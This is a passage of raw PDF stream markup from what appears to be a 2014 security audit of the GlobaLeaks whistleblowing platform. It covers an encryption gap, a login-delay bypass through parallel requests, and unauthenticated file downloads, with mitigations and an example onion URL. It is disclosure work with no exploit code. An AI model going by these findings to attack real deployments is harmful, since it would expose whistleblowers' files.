BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 2.36186 Tw 12 TL /F4 10 Tf 0 0 0 rg (does not provide plausible deniability ) Tj /F1 10 Tf (by dint of having the same number of digits as a phone) Tj T* 0 Tw (number, and) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 699.0236 cm
Q
q
1 0 0 1 62.69291 687.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (poorer usability ) Tj /F1 10 Tf (due to longer receipts, then:) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 687.0236 cm
Q
q
1 0 0 1 62.69291 669.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (-they should change the ) Tj /F3 10 Tf (receipt_regexp ) Tj /F1 10 Tf (to: ) Tj /F3 10 Tf ([0-9a-z]{16}) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 651.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (If the Node administrator selects a policy which is:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 645.0236 cm
Q
q
1 0 0 1 62.69291 645.0236 cm
Q
q
1 0 0 1 62.69291 633.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (vulnerable ) Tj /F1 10 Tf (to guessing attacks, as specified by the timing predictions in above,) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 627.0236 cm
Q
q
1 0 0 1 62.69291 603.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .93811 Tw 12 TL /F4 10 Tf 0 0 0 rg (does provide plausible deniability ) Tj /F1 10 Tf (by dint of having the same number of digits as a phone number,) Tj T* 0 Tw (and) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 597.0236 cm
Q
q
1 0 0 1 62.69291 585.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (better usability ) Tj /F1 10 Tf (due to shorter receipts, then:) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 585.0236 cm
Q
q
1 0 0 1 62.69291 567.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (-they should leave the ) Tj /F3 10 Tf (receipt_regexp ) Tj /F1 10 Tf (to the current default of: ) Tj /F3 10 Tf ([0-9]{10}) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 549.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.869318 Tw 12 TL /F1 10 Tf 0 0 0 rg (As of this report writing, we have not settled on a concrete remediation recommendation. We are) Tj T* 0 Tw .275984 Tw (continuing to explore remediation options as well as the clarifying the criteria related to usability, plausible) Tj T* 0 Tw (deniability, and brute force resistance in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #823) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 477.0236 cm
q
BT 1 0 0 1 0 14 Tm .719984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed by code inspection. Our feasibility is based on estimates and we have not developed) Tj T* 0 Tw (proof-of-concept guessing attacks.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 471.0236 cm
Q
q
1 0 0 1 62.69291 471.0236 cm
Q
q
1 0 0 1 62.69291 459.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #823) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 459.0236 cm
Q
q
1 0 0 1 62.69291 459.0236 cm
Q
 
endstream
endobj
% 'R357': class PDFStream 
357 0 obj
% page stream
<< /Length 7695 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 690.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.203984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (If a Receiver is configured without a public key, submitted files remain on the filesystem) Tj T* 0 Tw 1.497318 Tw (unencrypted. The admin sees no sign of this unless they open Receivers Configuration, click on each) Tj T* 0 Tw (Receiver, and check each for an "Encryption not enabled!" warning.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 660.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.260751 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (A negligent, malicious, or compromised Receiver account can expose a Node administrator to) Tj T* 0 Tw (unexpected liability.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 642.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to control a Receiver account.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
BT 1 0 0 1 0 14 Tm .39811 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This issue is quite feasible on real installations given that Receivers may not share the same) Tj T* 0 Tw (level of risk aversion as the Node administrator, or Receivers may be negligent, naive, or malicious.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 594.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by using the software, inspecting the filesystem, and reading the source.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 534.0236 cm
q
BT 1 0 0 1 0 26 Tm .045976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/jobs/delivery_sched.py) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (APSDelivery ) Tj /F1 10 Tf (runs shortly after file upload. It leaves the) Tj T* 0 Tw .216654 Tw (plaintext file on disk unless all Receivers have a public key configured at that time. Once a Receiver's key) Tj T* 0 Tw (is added, files already on the filesystem for that Receiver do not become encrypted.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 504.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.574651 Tw (A Receiver sees the decrypted files regardless. However, this way a careless Receiver can make the) Tj T* 0 Tw (whole Node more vulnerable to an attacker.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 462.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .384987 Tw (A special case of this issue is that Receivers who have public keys configured will see files as encrypted,) Tj T* 0 Tw 1.211567 Tw (even though they may actually be stored in plain text on the disk for other Receivers. This may give a) Tj T* 0 Tw (false sense of security and might affect advice they give to the Whistleblower.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 444.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 414.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.089213 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should regularly ensure that all Receivers have) Tj T* 0 Tw (public keys configured, and should manually check the uploaded files to verify that they are all encrypted.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 372.0236 cm
q
BT 1 0 0 1 0 26 Tm 8.403314 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrator can check if there are plaintext files by running) Tj T* 0 Tw 7.435529 Tw /F3 10 Tf (file) Tj ( ) Tj (/var/globaleaks/files/submission/* ) Tj /F1 10 Tf (and looking for files whose type is not) Tj T* 0 Tw /F3 10 Tf (PGP) Tj ( ) Tj (message) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 354.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 324.0236 cm
q
BT 1 0 0 1 0 14 Tm .237318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Being able to accept non-encrypted submissions may be an important use case for ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. As such,) Tj T* 0 Tw (we make the following suggestions:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 318.0236 cm
Q
q
1 0 0 1 62.69291 318.0236 cm
Q
q
1 0 0 1 62.69291 294.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 3.336136 Tw 12 TL /F1 10 Tf 0 0 0 rg (By default, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (should refuse Tips unless the files will be encrypted, only accepting) Tj T* 0 Tw (unencrypted submissions after the Node administrator ) Tj /F4 10 Tf (explicitly ) Tj /F1 10 Tf (opts-in to receiving plaintext files.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 288.0236 cm
Q
q
1 0 0 1 62.69291 276.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Whistleblowers should be warned before uploading files that will not be encrypted.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 270.0236 cm
Q
q
1 0 0 1 62.69291 246.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .669318 Tw (Warn the Node administrator that some Receivers do not have public keys configured, or make the) Tj T* 0 Tw (existing warnings more prominent.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 240.0236 cm
Q
q
1 0 0 1 62.69291 180.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 2.50186 Tw (Warn other receivers when the file has been encrypted to them but is in plaintext for another) Tj T* 0 Tw (receiver.) Tj T* ET
Q
Q
q
1 0 0 1 23 27 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 24 cm
Q
q
1 0 0 1 20 24 cm
Q
q
1 0 0 1 20 0 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.779982 Tw 12 TL /F1 10 Tf 0 0 0 rg (This may not be an acceptable solution, since according to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (, the) Tj T* 0 Tw (receivers should not know which other receiver received the file.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 180.0236 cm
Q
q
1 0 0 1 62.69291 162.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (The issue has been verified.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 156.0236 cm
Q
q
1 0 0 1 62.69291 156.0236 cm
Q
q
1 0 0 1 62.69291 144.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #824) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 144.0236 cm
Q
q
1 0 0 1 62.69291 144.0236 cm
Q
 
endstream
endobj
% 'R358': class PDFStream 
358 0 obj
% page stream
<< /Length 5312 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-30) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 14 Tm .576647 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (implements an exponentially-increasing delay when a login fails. An attacker can) Tj T* 0 Tw (get around this by sending requests in parallel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 684.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker can perform online login guessing attacks faster than expected.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 654.0236 cm
q
BT 1 0 0 1 0 14 Tm .461318 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (To perform this attack, the attacker must be able to establish multiple connections to) Tj T* 0 Tw (the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (web server in parallel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 636.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This issue can be exploited by simply making requests in parallel rather than in series.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 606.0236 cm
q
BT 1 0 0 1 0 14 Tm .275984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection and testing with the script provided in ) Tj /F4 10 Tf (Appendix C. Script) Tj T* 0 Tw (for Issue E) Tj /F1 10 Tf (. When requests are made sequentially, they are held up. When made in parallel, they aren't.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 588.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 546.0236 cm
q
BT 1 0 0 1 0 26 Tm 29.84854 Tw 12 TL /F1 10 Tf 0 0 0 rg (The login delay is implemented in ) Tj /F3 10 Tf (security_sleep\(\) ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.128863 Tw /F3 10 Tf (globaleaks/handlers/authentication.py) Tj /F1 10 Tf (. It is done by calling ) Tj /F3 10 Tf (callLater\(\)) Tj /F1 10 Tf (, which will freeze) Tj T* 0 Tw (the current connection, but will not prevent the attacker from opening a new one.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 504.0236 cm
q
BT 1 0 0 1 0 26 Tm 2.555697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The current defense only becomes effective when the attacker has exhausted all of the concurrent) Tj T* 0 Tw 2.934147 Tw (connections that the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (can accept, and ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (cannot accept any more concurrent) Tj T* 0 Tw (connections, i.e. it is effectively under denial of service.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 486.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 444.0236 cm
q
BT 1 0 0 1 0 26 Tm .163984 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should monitor the rate of login requests to detect) Tj T* 0 Tw .099988 Tw (an attack and respond by either shutting down the server or using a firewall to to rate-limit the attacker. To) Tj T* 0 Tw (monitor the number of concurrent connections, the ) Tj /F3 10 Tf (netstat) Tj ( ) Tj (-ptan ) Tj /F1 10 Tf (command can be used.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 426.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 372.0236 cm
q
BT 1 0 0 1 0 38 Tm 3.251163 Tw 12 TL /F1 10 Tf 0 0 0 rg (It is difficult to find a long-term solution to this problem, since all of the obvious solutions make) Tj T* 0 Tw .930697 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (more vulnerable to denial of service attacks. A possible solution might involve requiring the) Tj T* 0 Tw 2.583828 Tw (client to solve a computationally- and memory-hard proof of work challenge for each authentication) Tj T* 0 Tw (request. We leave this for future work.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 354.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 348.0236 cm
Q
q
1 0 0 1 62.69291 348.0236 cm
Q
q
1 0 0 1 62.69291 324.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .199983 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- This issue may be related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (or ) Tj 0 0 .501961 rg (GlobaLeaks Submission) Tj T* 0 Tw (Flood Resiliency Project ) Tj 0 0 0 rg (are directly relevant.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 318.0236 cm
Q
q
1 0 0 1 62.69291 306.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #825) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 306.0236 cm
Q
q
1 0 0 1 62.69291 306.0236 cm
Q
 
endstream
endobj
% 'R359': class PDFStream 
359 0 obj
% page stream
<< /Length 6874 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue F. Tip Files Can Be Downloaded Without Authenticating) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 678.0236 cm
q
BT 1 0 0 1 0 38 Tm .644651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (does not check if the user is authenticated when downloading files. The files are) Tj T* 0 Tw 1.550651 Tw (protected only with a string generated by ) Tj /F3 10 Tf (uuid4\(\)) Tj /F1 10 Tf (, which might be predictable \(see ) Tj 0 0 .501961 rg (Issue K: Secrets) Tj T* 0 Tw .336412 Tw (Generated with Non-CSPRNG) Tj 0 0 0 rg (\), or vulnerable to side-channel attacks \(see ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able) Tj T* 0 Tw (To Extract Secrets Through Side-Channel Attacks) Tj 0 0 0 rg (\).) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 660.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker can access the files associated with a Tip.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 14 Tm .111163 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to know the file or collection download token, and must be able to) Tj T* 0 Tw (make requests to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Feasibility:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 558.0236 cm
q
BT 1 0 0 1 0 38 Tm .60332 Tw 12 TL /F1 10 Tf 0 0 0 rg (Because the file download token appears in the URL, an attacker may find it in the user's web browser's) Tj T* 0 Tw 2.321318 Tw (download history. The ) Tj /F4 10 Tf (Tor Browser Bundle ) Tj /F1 10 Tf (does not keep history, except for the "Undo Close Tab") Tj T* 0 Tw 1.649985 Tw (feature, which exists until the browser is restarted. Most regular browsers save the URL to history by) Tj T* 0 Tw (default.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 528.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .919535 Tw (The attacker may also be able to extract the token via a timing side channel, or to guess it if it was not) Tj T* 0 Tw (generated by a cryptographically-secure random number generator.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 486.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.40784 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue has been confirmed by copying the collection URL, logging out, restarting ) Tj /F4 10 Tf (Tor) Tj T* 0 Tw .278735 Tw (Browser Bundle) Tj /F1 10 Tf (, then visiting the URL. The zip file containing all of the Tip's files downloads successfully.) Tj T* 0 Tw (An individual-file download URL passed a similar test using ) Tj /F4 10 Tf (wget) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 468.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 450.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/handlers/collection.py) Tj /F1 10 Tf (, ) Tj /F3 10 Tf (CollectionDownload ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (@unauthenticated) Tj /F1 10 Tf (:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 356.8236 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 84 re B*
Q
q
BT 1 0 0 1 0 62 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (class) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 0 1 rg (CollectionDownload) Tj /F3 10 Tf 0 0 0 rg (\() Tj (BaseHandler) Tj (\):) Tj  T*  T* (    ) Tj .666667 .133333 1 rg (@transport_security_check) Tj 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ('wb') Tj 0 0 0 rg (\)) Tj  T* (    ) Tj .666667 .133333 1 rg (@unauthenticated) Tj 0 0 0 rg  T* (    ) Tj .666667 .133333 1 rg (@inlineCallbacks) Tj 0 0 0 rg  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (token) Tj (,) Tj ( ) Tj (path) Tj (,) Tj ( ) Tj (compression) Tj (\):) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 336.8236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Given the collection URL, which looks like...) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 305.3849 cm
q
q
.930106 0 0 .930106 0 0 cm
q
1 0 0 1 6.6 7.095962 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 504 24 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F3 10 Tf 12 TL (http://uzekbw3injzwsox2.onion/rtip/9e0b4f04-c5b2-45ed-afae-6b38eb32529e/collection) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 261.3849 cm
q
BT 1 0 0 1 0 26 Tm .884751 Tw 12 TL /F1 10 Tf 0 0 0 rg (...a request to that URL will retrieve the zip file, even if the requester is not logged in as a receiver with) Tj T* 0 Tw 9.945318 Tw (access to the Tip. The string in the URL is generated and set to expire in) Tj T* 0 Tw /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (as follows:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 120.1849 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 132 re B*
Q
q
